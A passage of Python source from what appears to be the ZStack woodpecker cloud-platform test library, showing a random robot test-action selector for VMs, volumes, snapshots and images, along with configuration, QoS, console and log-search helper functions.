test_stage_obj.set_vm_live_template_cap(test_stage.template_live_creation)
else:
test_stage_obj.set_vm_live_template_cap(test_stage.template_no_live_creation)
#Thirdly, check VM's volume status. E.g. if could add a new volume.
vm_volumes = test_dict.get_volume_list(target_vm.get_vm().uuid)
vm_volume_number = len(vm_volumes)
if vm_volume_number > 0 and vm_volume_number < 24:
test_stage_obj.set_vm_volume_state(test_stage.vm_volume_att_not_full)
attached_volume = random.choice(vm_volumes)
elif vm_volume_number == 0:
test_stage_obj.set_vm_volume_state(test_stage.vm_no_volume_att)
else:
test_stage_obj.set_vm_volume_state(test_stage.vm_volume_att_full)
attached_volume = random.choice(vm_volumes)
if lib_check_vm_live_migration_cap(vm):
test_stage_obj.set_vm_live_migration_cap(test_stage.vm_live_migration)
else:
test_stage_obj.set_vm_live_migration_cap(test_stage.no_vm_live_migration)
else:
test_stage_obj.set_vm_state(test_stage.Any)
test_stage_obj.set_vm_volume_state(test_stage.Any)
test_stage_obj.set_vm_live_migration_cap(test_stage.Any)
#Fourthly, choose a available volume for possibly attach or delete
avail_volumes = list(test_dict.get_volume_list(test_stage.free_volume))
avail_volumes.extend(test_dict.get_volume_list(test_stage.deleted_volume))
if avail_volumes:
ready_volume = random.choice(avail_volumes)
if ready_volume.get_state() != vol_header.DELETED:
test_stage_obj.set_volume_state(test_stage.free_volume)
else:
test_stage_obj.set_volume_state(test_stage.deleted_volume)
else:
test_stage_obj.set_volume_state(test_stage.no_free_volume)
#Fifthly, choose a volume for possible snasphot operation
all_volume_snapshots = test_dict.get_all_available_snapshots()
if all_volume_snapshots:
target_volume_snapshots = random.choice(all_volume_snapshots)
snapshot_volume_obj = target_volume_snapshots.get_target_volume()
snapshot_volume = snapshot_volume_obj.get_volume()
if snapshot_volume_obj.get_state() == vol_header.CREATED:
#It means the volume is just created and not attached to any VM yet.
#This volume can not create any snapshot.
test_stage_obj.set_snapshot_state(test_stage.no_volume_file)
else:
#if volume is not attached to any VM, we assume vm state is stopped
# or we assume its hypervisor support live snapshot creation
if snapshot_volume_obj.get_state() != vol_header.ATTACHED:
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_live_creation)
test_stage_obj.set_volume_vm_state(vm_header.STOPPED)
elif snapshot_volume_obj.get_target_vm().get_state() == vm_header.DESTROYED:
test_stage_obj.set_snapshot_live_cap(test_stage.Any)
test_stage_obj.set_volume_vm_state(vm_header.DESTROYED)
else:
volume_vm = snapshot_volume_obj.get_target_vm()
test_stage_obj.set_volume_vm_state(volume_vm.get_state())
target_vm_inv = volume_vm.get_vm()
host_inv = lib_find_host_by_vm(target_vm_inv)
if host_inv:
if lib_check_live_snapshot_cap(host_inv):
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_live_creation)
else:
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_no_live_creation)
#random pick up an available snapshot. Firstly choose from primary snapshot.
target_snapshot = None
#If volume is expunged, there isn't snapshot in primary storage
if target_volume_snapshots.get_primary_snapshots() \
and snapshot_volume_obj.get_state() != vol_header.DELETED\
and snapshot_volume_obj.get_state() != vol_header.EXPUNGED:
target_snapshot = random.choice(target_volume_snapshots.get_primary_snapshots())
if target_snapshot in target_volume_snapshots.get_backuped_snapshots():
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_both_ps_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_both_ps_bs)
else:
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_ps)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_ps)
else:
if target_volume_snapshots.get_backuped_snapshots():
target_snapshot = random.choice(target_volume_snapshots.get_backuped_snapshots())
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.no_snapshot)
#Sixly, check system vip resource
vip_available = False
if not TestAction.create_vip in excluded_actions_list:
if not public_l3:
test_util.test_fail('\
Test Case need to set robot_test_obj.public_l3, before call \
lib_vm_random_operation(robot_test_obj), otherwise robot can not judge if there\
is available free vip resource in system. Or you can add "create_vip" action \
into robot_test_obj.exclusive_actions_list.')
#check if system has available IP resource for allocation.
available_ip_evt = net_ops.get_ip_capacity_by_l3s([public_l3])
if available_ip_evt and available_ip_evt.availableCapacity > 0:
vip_available = True
#Add template image actions
avail_images = list(test_dict.get_image_list(test_stage.new_template_image))
avail_images.extend(test_dict.get_image_list(test_stage.deleted_image))
if avail_images:
target_image = random.choice(avail_images)
if target_image.get_state() != image_header.DELETED:
test_stage_obj.set_image_state(test_stage.new_template_image)
else:
test_stage_obj.set_image_state(test_stage.deleted_image)
else:
test_stage_obj.set_image_state(test_stage.Any)
#Add SG actions
if test_dict.get_sg_list():
test_stage_obj.set_sg_state(test_stage.has_sg)
else:
test_stage_obj.set_sg_state(test_stage.no_sg)
#Add VIP actions
if test_dict.get_vip_list():
if vip_available:
test_stage_obj.set_vip_state(test_stage.has_vip)
else:
test_stage_obj.set_vip_state(test_stage.no_more_vip_res)
else:
if vip_available:
test_stage_obj.set_vip_state(test_stage.no_vip)
else:
test_stage_obj.set_vip_state(test_stage.no_vip_res)
test_util.test_logger("action state_dict: %s" % test_stage_obj.get_state())
if avail_images and target_image != None and target_image.get_image().mediaType == 'RootVolumeTemplate':
if excluded_actions_list == None:
excluded_actions_list2 = [TestAction.create_data_volume_from_image]
else:
excluded_actions_list2 = excluded_actions_list + [TestAction.create_data_volume_from_image]
action_list = ts_header.generate_action_list(test_stage_obj, \
excluded_actions_list2)
else:
action_list = ts_header.generate_action_list(test_stage_obj, \
excluded_actions_list)
test_util.test_logger('action list: %s' % action_list)
# Currently is randomly picking up.
next_action = lib_robot_pickup_action(action_list, \
robot_test_obj.get_action_history(), priority_actions, random_type)
robot_test_obj.add_action_history(next_action)
if next_action == TestAction.create_vm:
test_util.test_dsc('Robot Action: %s ' % next_action)
new_vm = lib_create_vm(cre_vm_opt)
test_dict.add_vm(new_vm)
test_util.test_dsc('Robot Action Result: %s; new VM: %s' % \
(next_action, new_vm.get_vm().uuid))
test_dict.create_empty_volume_list(new_vm.vm.uuid)
elif next_action == TestAction.stop_vm:
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.stop()
test_dict.mv_vm(target_vm, vm_header.RUNNING, vm_header.STOPPED)
elif next_action == TestAction.start_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.start()
test_dict.mv_vm(target_vm, vm_header.STOPPED, vm_header.RUNNING)
elif next_action == TestAction.reboot_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.reboot()
elif next_action == TestAction.destroy_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.destroy()
test_dict.rm_vm(target_vm, vm_current_state)
elif next_action == TestAction.expunge_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.expunge()
test_dict.rm_vm(target_vm, vm_current_state)
elif next_action == TestAction.migrate_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_host = lib_find_random_host(target_vm.vm)
if not target_host:
test_util.test_logger('no avaiable host was found for doing vm migration')
else:
target_vm.migrate(target_host.uuid)
elif next_action == TestAction.create_volume :
test_util.test_dsc('Robot Action: %s ' % next_action)
new_volume = lib_create_volume_from_offering()
test_dict.add_volume(new_volume)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s' % \
(next_action, new_volume.get_volume().uuid))
elif next_action == TestAction.attach_volume :
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, ready_volume.get_volume().uuid, \
target_vm.get_vm().uuid))
if not lib_check_vm_live_migration_cap(target_vm.vm):
ls_ref = lib_get_local_storage_reference_information(ready_volume.get_volume().uuid)
if ls_ref:
volume_host_uuid = ls_ref[0].hostUuid
vm_host_uuid = lib_get_vm_host(target_vm.vm).uuid
if vm_host_uuid and volume_host_uuid != vm_host_uuid:
test_util.test_logger('need to migrate volume: %s to host: %s, before attach it to vm: %s' % (ready_volume.get_volume().uuid, vm_host_uuid, target_vm.vm.uuid))
ready_volume.migrate(vm_host_uuid)
ready_volume.attach(target_vm)
test_dict.mv_volume(ready_volume, test_stage.free_volume, target_vm.vm.uuid)
elif next_action == TestAction.detach_volume:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, attached_volume.get_volume().uuid))
attached_volume.detach()
test_dict.mv_volume(attached_volume, target_vm.vm.uuid, test_stage.free_volume)
elif next_action == TestAction.delete_volume:
#if there is no free volume, but action is delete_volume. It means the
# the target volume is attached volume.
if not ready_volume:
ready_volume = attached_volume
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, ready_volume.get_volume().uuid))
ready_volume.delete()
test_dict.rm_volume(ready_volume)
elif next_action == TestAction.expunge_volume:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, ready_volume.get_volume().uuid))
ready_volume.expunge()
test_dict.rm_volume(ready_volume)
elif next_action == TestAction.migrate_volume :
#TODO: add normal initialized data volume into migration target.
root_volume_uuid = lib_get_root_volume(target_vm.get_vm()).uuid
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' \
% (next_action, root_volume_uuid, target_vm.get_vm().uuid))
target_host = lib_find_random_host_by_volume_uuid(root_volume_uuid)
if not target_host:
test_util.test_logger('no avaiable host was found for doing vm migration')
else:
vol_ops.migrate_volume(root_volume_uuid, target_host.uuid)
elif next_action == TestAction.idel :
test_util.test_dsc('Robot Action: %s ' % next_action)
lib_vm_random_idel_time(1, 5)
elif next_action == TestAction.create_image_from_volume:
root_volume_uuid = lib_get_root_volume(target_vm.vm).uuid
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, root_volume_uuid, target_vm.get_vm().uuid))
new_image = lib_create_template_from_volume(root_volume_uuid)
test_util.test_dsc('Robot Action Result: %s; new RootVolume Image: %s'\
% (next_action, new_image.get_image().uuid))
test_dict.add_image(new_image)
elif next_action == TestAction.create_data_vol_template_from_volume:
vm_volumes = target_vm.get_vm().allVolumes
vm_target_vol_candidates = []
for vm_volume in vm_volumes:
if vm_volume.status != 'Deleted':
vm_target_vol_candidates.append(vm_volume)
vm_target_vol = random.choice(vm_target_vol_candidates)
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, vm_target_vol.uuid, target_vm.get_vm().uuid))
new_data_vol_temp = lib_create_data_vol_template_from_volume(target_vm, vm_target_vol)
test_util.test_dsc('Robot Action Result: %s; new DataVolume Image: %s' \
% (next_action, new_data_vol_temp.get_image().uuid))
test_dict.add_image(new_data_vol_temp)
elif next_action == TestAction.create_data_volume_from_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
new_volume = lib_create_data_volume_from_image(target_image)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s' % \
(next_action, new_volume.get_volume().uuid))
test_dict.add_volume(new_volume)
elif next_action == TestAction.delete_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
target_image.delete()
test_dict.rm_image(target_image)
#image will be move to deleted state when call rm_image
#test_dict.add_image(target_image, test_stage.deleted_image)
elif next_action == TestAction.expunge_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
bss = target_image.get_image().backupStorageRefs
bs_uuid_list = []
for bs in bss:
bs_uuid_list.append(bs.backupStorageUuid)
target_image.expunge(bs_uuid_list)
test_dict.rm_image(target_image)
elif next_action == TestAction.create_sg:
test_util.test_dsc('Robot Action: %s ' % next_action)
sg_vm = test_dict.get_sg_vm()
sg_creation_option = test_util.SecurityGroupOption()
sg_creation_option.set_name('robot security group')
new_sg = sg_vm.create_sg(sg_creation_option)
test_util.test_dsc(\
'Robot Action Result: %s; new SG: %s' % \
(next_action, new_sg.get_security_group().uuid))
elif next_action == TestAction.delete_sg:
sg_vm = test_dict.get_sg_vm()
target_sg = random.choice(sg_vm.get_all_sgs())
test_util.test_dsc(\
'Robot Action: %s; on SG: %s' % \
(next_action, target_sg.get_security_group().uuid))
sg_vm.delete_sg(target_sg)
#sg rule actions
elif next_action == TestAction.sg_rule_operations:
lib_execute_random_sg_rule_operation(test_dict, target_vm, cre_vm_opt)
#vip actions
elif next_action == TestAction.create_vip:
test_util.test_dsc('Robot Action: %s ' % next_action)
if target_vm:
vip = lib_create_vip_obj(target_vm.vm)
else:
vip = lib_create_vip_obj()
if not vip:
test_util.test_warn('vip creation failed. It is mostly because can not find public l3 network.')
test_util.test_dsc('Robot Action Result: %s; Fail.' % next_action)
else:
test_dict.add_vip(vip)
test_util.test_dsc('Robot Action Result: %s; new VIP: %s' % \
(next_action, vip.get_vip().uuid))
elif next_action == TestAction.delete_vip:
target_vip = random.choice(test_dict.get_all_vip_list())
test_util.test_dsc('Robot Action: %s; on VIP: %s' % \
(next_action, target_vip.get_vip().uuid))
net_ops.delete_vip(target_vip.get_vip().uuid)
test_dict.rm_vip(target_vip)
elif next_action == TestAction.vip_operations:
vip_action = ts_header.VipAction(test_dict, target_vm)
vip_action.execute_random_vip_ops()
elif next_action == TestAction.create_volume_snapshot:
target_volume_inv = \
target_volume_snapshots.get_target_volume().get_volume()
if target_volume_inv.type == vol_header.ROOT_VOLUME:
test_util.test_dsc('Robot Action: %s; on Root Volume: %s; on VM: %s' % \
(next_action, \
target_volume_inv.uuid, target_volume_inv.vmInstanceUuid))
else:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, \
target_volume_inv.uuid))
new_snapshot = lib_create_volume_snapshot_from_volume(target_volume_snapshots, robot_test_obj, test_dict, cre_vm_opt)
test_util.test_dsc('Robot Action Result: %s; new SP: %s' % \
(next_action, new_snapshot.get_snapshot().uuid))
elif next_action == TestAction.delete_volume_snapshot:
target_volume_snapshots.delete_snapshot(target_snapshot)
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
#If both volume and snapshots are deleted, volume_snapshot obj could be
# removed.
if not target_volume_snapshots.get_backuped_snapshots():
target_volume_obj = target_volume_snapshots.get_target_volume()
if target_volume_obj.get_state() == vol_header.EXPUNGED \
or (target_volume_snapshots.get_volume_type() == \
vol_header.ROOT_VOLUME \
and target_volume_obj.get_target_vm().get_state() == \
vm_header.EXPUNGED):
test_dict.rm_volume_snapshot(target_volume_snapshots)
elif next_action == TestAction.use_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.use_snapshot(target_snapshot)
elif next_action == TestAction.backup_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.backup_snapshot(target_snapshot)
elif next_action == TestAction.delete_backup_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.delete_backuped_snapshot(target_snapshot)
#Both volume and snapshots are deleted, volume_snapshot obj could be
# removed.
if not target_volume_snapshots.get_backuped_snapshots():
target_volume_obj = target_volume_snapshots.get_target_volume()
if target_volume_obj.get_state() == vol_header.EXPUNGED \
or (target_volume_snapshots.get_volume_type() == \
vol_header.ROOT_VOLUME \
and target_volume_obj.get_target_vm().get_state() == \
vm_header.EXPUNGED):
test_dict.rm_volume_snapshot(target_volume_snapshots)
elif next_action == TestAction.create_volume_from_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
new_volume_obj = target_snapshot.create_data_volume()
test_dict.add_volume(new_volume_obj)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s; on SP: %s'\
% (next_action, new_volume_obj.get_volume().uuid,\
target_snapshot.get_snapshot().uuid))
elif next_action == TestAction.create_image_from_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
new_image_obj = lib_create_image_from_snapshot(target_snapshot)
test_dict.add_image(new_image_obj)
test_util.test_dsc('Robot Action Result: %s; new Image: %s; on SP: %s'\
% (next_action, new_image_obj.get_image().uuid,\
target_snapshot.get_snapshot().uuid))
test_util.test_logger('Finsih action: %s execution' % next_action)
#TODO: add more action pickup strategy
def lib_robot_pickup_action(action_list, pre_robot_actions, \
priority_actions, selector_type):
test_util.test_logger('Action history: %s' % pre_robot_actions)
if not selector_type:
selector_type = action_select.default_strategy
action_selector = action_select.action_selector_table[selector_type]
return action_selector(action_list, pre_robot_actions, \
priority_actions).select()
def lib_get_test_stub():
'''test_stub lib is not global test library. It is test suite level common
lib. Test cases might be in different sub folders under test suite folder.
This function will help test case to find and load test_stub.py.'''
import inspect
import zstacklib.utils.component_loader as component_loader
caller_info_list = inspect.getouterframes(inspect.currentframe())[1]
caller_path = os.path.realpath(caller_info_list[1])
test_stub_cl = component_loader.ComponentLoader('test_stub', os.path.dirname(caller_path), 4)
test_stub_cl.load()
return test_stub_cl.module
#---------------------------------------------------------------
#Robot actions.
def lib_create_data_vol_template_from_volume(target_vm, vm_target_vol=None):
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
vm_inv = target_vm.get_vm()
backup_storage_uuid_list = lib_get_backup_storage_uuid_list_by_zone(vm_inv.zoneUuid)
new_data_vol_inv = vol_ops.create_volume_template(vm_target_vol.uuid, \
backup_storage_uuid_list, \
'vol_temp_for_volume_%s' % vm_target_vol.uuid)
new_data_vol_temp = zstack_image_header.ZstackTestImage()
new_data_vol_temp.set_image(new_data_vol_inv)
new_data_vol_temp.set_state(image_header.CREATED)
return new_data_vol_temp
def lib_create_volume_snapshot_from_volume(target_volume_snapshots, robot_test_obj, test_dict, cre_vm_opt=None):
target_volume_inv = \
target_volume_snapshots.get_target_volume().get_volume()
if not target_volume_snapshots.get_utility_vm():
ps_uuid = target_volume_inv.primaryStorageUuid
vol_utiltiy_vm = robot_test_obj.get_utility_vm(ps_uuid)
if not vol_utiltiy_vm:
#create utiltiy_vm on given primary storage.
util_vm_opt = test_util.VmOption(cre_vm_opt)
instance_offering_uuid = util_vm_opt.get_instance_offering_uuid()
if not instance_offering_uuid:
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING)[0].uuid
tag = tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'primaryStorage::allocator::uuid::%s' % ps_uuid)
possible_cluster = target_volume_inv.clusterUuid
if not possible_cluster:
possible_cluster = res_ops.query_resource_with_num(\
res_ops.CLUSTER, [], None, 0, 1)[0].uuid
cond = res_ops.gen_query_conditions('attachedClusterUuids', \
'=', possible_cluster)
possible_l2 = res_ops.query_resource(res_ops.L2_VLAN_NETWORK, \
cond)[0].uuid
cond = res_ops.gen_query_conditions('l2NetworkUuid', '=', \
possible_l2)
possible_l3 = res_ops.query_resource(res_ops.L3_NETWORK, \
cond)[0].uuid
util_vm_opt.set_l3_uuids([possible_l3])
vol_utiltiy_vm = lib_create_vm(util_vm_opt)
tag_ops.delete_tag(tag.uuid)
robot_test_obj.set_utility_vm(vol_utiltiy_vm)
test_dict.add_utility_vm(vol_utiltiy_vm)
vol_utiltiy_vm.check()
target_volume_snapshots.set_utility_vm(vol_utiltiy_vm)
return target_volume_snapshots.create_snapshot()
def lib_create_image_from_snapshot(target_snapshot):
snapshot_volume = target_snapshot.get_target_volume()
root_image_uuid = snapshot_volume.get_volume().rootImageUuid
root_img_inv = lib_get_image_by_uuid(root_image_uuid)
image_option = test_util.ImageOption()
image_option.set_name('creating_image_from_snapshot')
image_option.set_guest_os_type(root_img_inv.guestOsType)
image_option.set_bits(root_img_inv.bits)
image_option.set_root_volume_uuid(target_snapshot.get_snapshot().uuid)
image_option.set_backup_storage_uuid_list([root_img_inv.backupStorageRefs[0].backupStorageUuid])
target_snapshot.set_image_creation_option(image_option)
new_image_obj = target_snapshot.create_image_template()
return new_image_obj
def lib_create_data_volume_from_image(target_image):
bs_uuid = target_image.get_image().backupStorageRefs[0].backupStorageUuid
ps_uuid_list = \
lib_get_primary_storage_uuid_list_by_backup_storage(bs_uuid)
target_host_uuid = None
#TODO: need to consider multiple local storage condition, since zs 1.0 only
# support 1 local storage per host.
ps_uuid = random.choice(ps_uuid_list)
ps_inv = lib_get_primary_storage_by_uuid(ps_uuid)
if ps_inv.type == inventory.LOCAL_STORAGE_TYPE:
#local storage, need to assigne a host
target_host_uuid = \
random.choice(lib_find_hosts_by_ps_uuid(ps_uuid)).uuid
new_volume = target_image.create_data_volume(ps_uuid, \
'new_volume_from_template_%s' % target_image.get_image().uuid, \
host_uuid = target_host_uuid)
return new_volume
#------- load balance related function
def lib_create_lb_listener_option(lbl_name = 'lb ssh test',\
lbl_protocol = 'tcp', lbl_port = 22, lbi_port = 22, lb_uuid = None):
'''
Create common load balancer listener option.
'''
lb_creation_option = test_util.LoadBalancerListenerOption()
lb_creation_option.set_name(lbl_name)
lb_creation_option.set_protocol(lbl_protocol)
lb_creation_option.set_load_balancer_port(lbl_port)
lb_creation_option.set_instance_port(lbi_port)
lb_creation_option.set_load_balancer_uuid(lb_uuid)
return lb_creation_option
#------- over provision function --------
def lib_set_provision_memory_rate(rate):
return conf_ops.change_global_config('mevoco', 'overProvisioning.memory', rate)
def lib_set_provision_storage_rate(rate):
return conf_ops.change_global_config('mevoco', 'overProvisioning.primaryStorage', rate)
#--------QOS related function ---------
def lib_limit_volume_total_iops(instance_offering_uuid, iops, \
session_uuid = None):
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.VOLUME_IOPS, iops),\
session_uuid)
def lib_limit_volume_bandwidth(instance_offering_uuid, bandwidth, \
session_uuid = None):
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.VOLUME_BANDWIDTH, bandwidth),\
session_uuid)
def lib_limit_vm_network_bandwidth(instance_offering_uuid, bandwidth, \
outbound = True, session_uuid = None):
if outbound:
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.NETWORK_OUTBOUND_BANDWIDTH, bandwidth),\
session_uuid)
else:
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.NETWORK_INBOUND_BANDWIDTH, bandwidth),\
session_uuid)
#--------instance offering--------
def lib_create_instance_offering(cpuNum = 1, cpuSpeed = 16, \
memorySize = 536870912, name = 'new_instance', \
volume_iops = None, volume_bandwidth = None, \
net_outbound_bandwidth = None, net_inbound_bandwidth = None):
new_offering_option = test_util.InstanceOfferingOption()
new_offering_option.set_cpuNum(cpuNum)
new_offering_option.set_cpuSpeed(cpuSpeed)
new_offering_option.set_memorySize(memorySize)
new_offering_option.set_name(name)
new_offering = vm_ops.create_instance_offering(new_offering_option)
if volume_iops:
lib_limit_volume_total_iops(new_offering.uuid, volume_iops)
if volume_bandwidth:
lib_limit_volume_bandwidth(new_offering.uuid, volume_bandwidth)
if net_outbound_bandwidth:
lib_limit_vm_network_bandwidth(new_offering.uuid, net_outbound_bandwidth, outbound = True)
if net_inbound_bandwidth:
lib_limit_vm_network_bandwidth(new_offering.uuid, net_inbound_bandwidth, outbound = False)
return new_offering
def lib_get_reserved_memory():
return conf_ops.get_global_config_value('kvm', 'reservedMemory')
def lib_set_reserved_memory(value):
return conf_ops.change_global_config('kvm', 'reservedMemory', value)
def lib_get_active_host_number():
cond = res_ops.gen_query_conditions('state', '=', 'Enabled')
cond = res_ops.gen_query_conditions('status', '=', 'Connected', cond)
result = res_ops.query_resource_count(res_ops.HOST, cond)
return result
def lib_get_delete_policy(category = 'vm'):
'''
category could be vm, volume, image.
'''
return conf_ops.get_global_config_value(category, 'deletionPolicy')
def lib_get_vm_delete_policy():
return lib_get_delete_policy()
def lib_get_volume_delete_policy():
return lib_get_delete_policy('volume')
def lib_get_image_delete_policy():
return lib_get_delete_policy('image')
def lib_set_delete_policy(category = 'vm', value = 'Direct'):
'''
value could be Direct, Delay, Never
category could be vm, image, volume
'''
return conf_ops.change_global_config(category, 'deletionPolicy', value)
def lib_set_expunge_time(category = 'vm', value = 1):
'''
value could be 1~N
category could be vm, image, volume
'''
return conf_ops.change_global_config(category, 'expungePeriod', value)
def lib_get_expunge_time(category = 'vm'):
'''
category could be vm, volume, image.
'''
return conf_ops.get_global_config_value(category, 'expungePeriod')
def lib_update_test_state_object_delete_policy(category, policy, \
test_state_object):
'''
category could be vm, volume, image.
policy could be DIRECT, DELAY, NEVER
test_state_object is test_state.TestStageDict
'''
lib_set_delete_policy(category = category, value = policy)
if category == 'vm':
test_state_object.update_vm_delete_policy(policy)
elif category == 'volume':
test_stage_object.update_volume_delete_policy(policy)
elif category == 'image':
test_stage_object.update_image_delete_policy(policy)
else:
test_util.test_fail('Category can only be vm, volume or image. But your input is: %s'% category)
test_util.test_logger('%s delete policy has been changed to %s' % \
(category, policy))
def lib_update_test_state_object_delete_delay_time(category, \
delay_time, test_state_object):
'''
category could be vm, volume, image.
delete_delay_time is an int value for seconds.
test_state_object is test_state.TestStageDict
'''
lib_set_expunge_time(category = category, value = delay_time)
if category == 'vm':
test_state_object.update_vm_delete_delay_time(delay_time)
elif category == 'volume':
test_state_object.update_volume_delete_delay_time(delay_time)
elif category == 'image':
test_state_object.update_image_delete_delay_time(delay_time)
else:
test_util.test_fail('Category can only be vm, volume or image. But your input is: %s'% category)
test_util.test_logger('%s delete delay time has been changed to \
%s' % (category, policy))
def lib_get_local_storage_reference_information(volume_uuid):
cond = res_ops.gen_query_conditions('volume.uuid', '=', volume_uuid)
ls_ref = res_ops.query_resource(res_ops.LOCAL_STORAGE_RESOURCE_REF, cond)
return ls_ref
def lib_get_local_storage_volume_host(volume_uuid):
ls_ref = lib_get_local_storage_reference_information(volume_uuid)
if ls_ref:
host_uuid = ls_ref[0].hostUuid
cond = res_ops.gen_query_conditions('uuid', '=', host_uuid)
return res_ops.query_resource(res_ops.HOST, cond)[0]
def lib_get_image_store_backup_storage():
for zone in res_ops.query_resource(res_ops.ZONE):
for bs_uuid in lib_get_backup_storage_uuid_list_by_zone(zone.uuid):
bs = lib_get_backup_storage_by_uuid(bs_uuid)
if bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
return bs
def lib_request_console_access(vm_uuid, session_uuid=None):
return cons_ops.request_console_access(vm_uuid, session_uuid)
def lib_get_vm_console_address(vm_uuid, session_uuid=None):
return cons_ops.get_vm_console_address(vm_uuid, session_uuid)
def lib_set_vm_console_password(vm_uuid, console_password, session_uuid=None):
return cons_ops.set_vm_console_password(vm_uuid, console_password, session_uuid)
def lib_delete_vm_console_password(vm_uuid, session_uuid=None):
return cons_ops.delete_vm_console_password(vm_uuid, session_uuid)
def lib_get_vm_console_password(vm_uuid, session_uuid=None):
return cons_ops.get_vm_console_password(vm_uuid, session_uuid)
def lib_get_ha_enable():
return conf_ops.get_global_config_value('ha', 'enable')
def lib_set_ha_enable(value):
return conf_ops.change_global_config('ha', 'enable', value)
def lib_get_ha_selffencer_maxattempts():
return conf_ops.get_global_config_value('ha', 'host.selfFencer.maxAttempts')
def lib_set_ha_selffencer_maxattempts(value):
return conf_ops.change_global_config('ha', 'host.selfFencer.maxAttempts', value)
def lib_get_ha_selffencer_storagechecker_timeout():
return conf_ops.get_global_config_value('ha', 'host.selfFencer.storageChecker.timeout')
def lib_set_ha_selffencer_storagechecker_timeout(value):
return conf_ops.change_global_config('ha', 'host.selfFencer.storageChecker.timeout', value)
def lib_get_reserved_primary_storage():
return conf_ops.get_global_config_value('primaryStrorage', 'reservedCapacity')
def lib_set_primary_storage_imagecache_gc_interval(value):
return conf_ops.change_global_config('primaryStorage', 'imageCache.garbageCollector.interval', value)
def lib_add_vm_sshkey(vm_uuid, sshkey, session_uuid = None):
return tag_ops.create_system_tag('VmInstanceVO', \
vm_uuid, \
'%s::%s' % (vm_header.SSHKEY, sshkey),\
session_uuid)
def lib_get_local_management_server_log_path():
return shell.call('zstack-ctl status | grep "log file:" | awk \'{print $3}\'')
def lib_get_remote_management_server_log_path(node_ip, node_username, node_password):
cmd = 'zstack-ctl status | grep "log file:" | awk \'{print $3}\''
return lib_execute_ssh_cmd(node_ip, node_username, node_password, cmd, 180)
def lib_get_local_management_server_log():
return shell.call('cat %s' % (lib_get_local_management_server_log_path()))
def lib_find_in_local_management_server_log(timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
cmd = 'grep "%s" %s' % (datetime, lib_get_local_management_server_log_path().strip())
try:
out = shell.call(cmd)
except:
return False
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
